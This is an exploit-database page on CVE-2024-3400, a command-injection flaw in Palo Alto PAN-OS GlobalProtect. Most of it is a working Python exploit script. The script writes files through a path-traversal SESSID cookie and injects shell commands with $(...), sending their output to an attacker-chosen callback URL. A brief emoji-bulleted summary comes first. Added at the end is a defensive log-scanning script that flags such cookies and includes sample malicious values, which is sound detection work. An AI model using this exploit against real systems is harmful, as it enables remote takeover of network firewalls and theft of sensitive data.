The Exploit Database - CXSecurity.com, 5 July 2024
Palo Alto PAN-OS Command Execution / Arbitrary File Creation

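Palo Alto Networks PAN-OS contains a command injection vulnerability that an attacker can exploit to execute arbitrary commands on the target system. The vulnerability affects multiple versions of PAN-OS 11.1, 11.0 and 10.2. By sending a crafted malicious HTTP request, an attacker can execute arbitrary commands on the target system and thereby take control of the system or obtain sensitive information.

😄 The vulnerability mainly affects multiple versions of PAN-OS 11.1, 11.0 and 10.2; an attacker can exploit it by sending a crafted malicious HTTP request to execute arbitrary commands on the target system.

😎 An attacker can exploit the vulnerability to execute arbitrary commands on the target system and thereby take control of it or obtain sensitive information. For example, the attacker can run commands on the target system to obtain sensitive information such as the system administrator's password or other confidential data.

😔 Exploiting the vulnerability requires that the attacker can reach the target system and construct a malicious HTTP request. The attacker may gain access to the target system through phishing, network attacks and similar means.

😥 To prevent exploitation, users should promptly update PAN-OS to the latest version. Users should also strengthen their network defences, for example with firewalls and intrusion detection systems, to keep attackers from reaching the target system.

😩 The discovery of this vulnerability is another reminder that network security cannot be neglected: software must be kept up to date and network defences strengthened to withstand attacks effectively.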

```python
# Exploit Title: Palo Alto PAN-OS < v11.1.2-h3 - Command Injection and Arbitrary File Creation
# Date: 21 Apr 2024
# Exploit Author: Kr0ff
# Vendor Homepage: https://security.paloaltonetworks.com/CVE-2024-3400
# Software Link: -
# Version: PAN-OS 11.1 < 11.1.0-h3, < 11.1.1-h1, < 11.1.2-h3
#          PAN-OS 11.0 < 11.0.0-h3, < 11.0.1-h4, < 11.0.2-h4, < 11.0.3-h10, < 11.0.4-h1
#          PAN-OS 10.2 < 10.2.0-h3, < 10.2.1-h2, < 10.2.2-h5, < 10.2.3-h13, < 10.2.4-h16, < 10.2.5-h6, < 10.2.6-h3, < 10.2.7-h8, < 10.2.8-h3, < 10.2.9-h1
# Tested on: Debian
# CVE : CVE-2024-3400

#!/usr/bin/env python3

import sys

try:
    import argparse
    import requests
except ImportError:
    print("Missing dependencies, either requests or argparse not installed")
    sys.exit(2)

# https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis
# https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/

def check_vuln(target: str, file: str) -> bool:
    ret = False

    uri = "/ssl-vpn/hipreport.esp"

    s = requests.Session()
    r = ""

    headers = {
        "User-Agent" : \
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36", # Windows 10 Chrome 118.0.0.0
        "Content-Type": "application/x-www-form-urlencoded",
        "Cookie": \
            f"SESSID=../../../var/appweb/sslvpndocs/global-protect/portal/images/{file}"
    }

    headers_noCookie = {
        "User-Agent" : \
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" # Windows 10 Chrome 118.0.0.0
    }

    if not "http://" or not "https://" in target:
        target = "http://" + target
        try:
            r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )
        except requests.exceptions.Timeout or requests.ConnectionError as e:
            print(f"Request timed out for \"HTTP\" !{e}")

            print("Trying with \"HTTPS\"...")

            target = "https://" + target
            try:
                r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )
            except requests.exceptions.Timeout or requests.ConnectionError as e:
                print(f"Request timed out for \"HTTPS\"")
                sys.exit(1)
    else:
        r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )

    if r.status_code == 200:
        r = s.get( (target + f"/global-protect/portal/images/{file}"), verify=False, headers=headers_noCookie, timeout=10 )
        if r.status_code == 403:
            print("Target vulnerable to CVE-2024-3400")
            ret = True
    else:
        return ret

    return ret

def cmdexec(target: str, callback_url: str, payload: str) -> bool:
    ret = False
    p = ""

    if " " in payload:
        p = payload.replace(" ", "${IFS)")

    uri = "/ssl-vpn/hipreport.esp"

    headers = {
        "User-Agent" : \
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36", # Windows 10 Chrome 118.0.0.0
        "Content-Type": "application/x-www-form-urlencoded",
        "Cookie": \
            f"SESSID=../../../../opt/panlogs/tmp/device_telemetry/minute/attack782{callback_url}?r=$({payload})"
    }

    s = requests.Session()
    r = ""

    if not "http://" or not "https://" in target:
        target = "http://" + target
        try:
            r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )
        except requests.exceptions.Timeout or requests.ConnectionError as e:
            print(f"Request timed out for \"HTTP\" !{e}")

            print("Trying with \"HTTPS\"...")

            target = "https://" + target
            try:
                r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )
            except requests.exceptions.Timeout or requests.ConnectionError as e:
                print(f"Request timed out for \"HTTPS\"")
                sys.exit(1)
    else:
        r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )

    if not "Success" in r.text:
        return ret
    else:
        ret = True

    return ret

# Initialize parser for arguments
def argparser(selection=None):
    parser = argparse.ArgumentParser( description='CVE-2024-3400 - Palo Alto OS Command Injection' )

    subparser = parser.add_subparsers( help="Available modules", dest="module")

    exploit_subp = subparser.add_parser( "exploit", help="Exploit module of script")
    exploit_subp.add_argument( "-t", "--target",help="Target to send payload to", required=True )
    exploit_subp.add_argument( "-p", "--payload", help="Payload to send (e.g: whoami)", required=True )
    exploit_subp.add_argument( "-c", "--callbackurl", help="The callback url such as burp collaborator or similar", required=True )
    #---------------------------------------
    check_subp = subparser.add_parser( "check", help="Vulnerability check module of script" )
    check_subp.add_argument( "-t", "--target", help="Target to check if vulnerable", required=True )
    check_subp.add_argument( "-f", "--filename", help="Filename of the payload (e.g \"exploitCheck.exp\"", required=True )

    args = parser.parse_args(selection)
    args = parser.parse_args(args=None if sys.argv[1:] else ["-h"])

    if args.module == "exploit":
        cmdexec(args.target, args.callbackurl, args.payload)

    if args.module == "check":
        check_vuln(args.target, args.filename)

if __name__ == "__main__":
    argparser()
    print("Finished !")
```
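
Seen from the defender's side, both requests in the script above go to /ssl-vpn/hipreport.esp and carry a SESSID cookie that holds a filesystem path or a $(...) substitution instead of a session identifier. The following is an added detection example, not part of the original page or the exploit author's code; the JSON-lines log format, its field names and the assumption that a legitimate SESSID is GUID-shaped are hypothetical.

```python
import json
import re

HIP_URI = "/ssl-vpn/hipreport.esp"  # endpoint the script on this page posts to
# Assumption: a legitimate SESSID is a GUID; adjust to what your portal issues.
GUID = re.compile(r"^[0-9a-fA-F]{8}(-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12}$")
TRAVERSAL = re.compile(r"\.\.[/\\]")            # ../ or ..\ inside the value
SHELL_META = re.compile(r"\$\(|\$\{|`|[|&<>]")  # substitution / redirection

def sessid_from_cookie(header):
    """Return the raw SESSID value from a Cookie header, or None if absent."""
    for part in header.split(";"):
        name, _, value = part.strip().partition("=")
        if name == "SESSID":
            return value
    return None

def classify(record):
    """Return the reasons a logged request looks like a CVE-2024-3400 attempt."""
    value = sessid_from_cookie(record.get("cookie", ""))
    if record.get("path", "").split("?", 1)[0] != HIP_URI or value is None:
        return []
    reasons = []
    if TRAVERSAL.search(value):
        reasons.append("path-traversal")
    if SHELL_META.search(value):
        reasons.append("shell-metacharacter")
    if not reasons and not GUID.match(value):
        reasons.append("non-guid-sessid")  # allowlist catch-all
    return reasons

def scan(lines):
    """Parse JSON log lines; return (source, reasons) for each flagged request."""
    records = [json.loads(line) for line in lines]
    return [(r["src"], classify(r)) for r in records if classify(r)]

# Constructed sample log (hypothetical JSON-lines export from a proxy or WAF).
SAMPLE_LOG = [
    '{"src": "192.0.2.10", "path": "/ssl-vpn/hipreport.esp", "cookie": "SESSID=01234567-89ab-cdef-0123-456789abcdef"}',
    '{"src": "198.51.100.7", "path": "/ssl-vpn/hipreport.esp", "cookie": "SESSID=../../../var/appweb/sslvpndocs/global-protect/portal/images/probe.txt"}',
    '{"src": "203.0.113.44", "path": "/ssl-vpn/hipreport.esp", "cookie": "SESSID=../../../../opt/panlogs/tmp/device_telemetry/minute/x?r=$(whoami)"}',
    '{"src": "192.0.2.20", "path": "/global-protect/login.esp", "cookie": "lang=en"}',
    '{"src": "192.0.2.55", "path": "/ssl-vpn/hipreport.esp", "cookie": "SESSID=AAAA"}',
]

if __name__ == "__main__":
    for src, reasons in scan(SAMPLE_LOG):
        print(src, ",".join(reasons))
```

The same checks can be applied to any source that records the Cookie header for the GlobalProtect portal; the non-guid-sessid result is the allowlist fallback and catches values the two deny patterns do not name.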
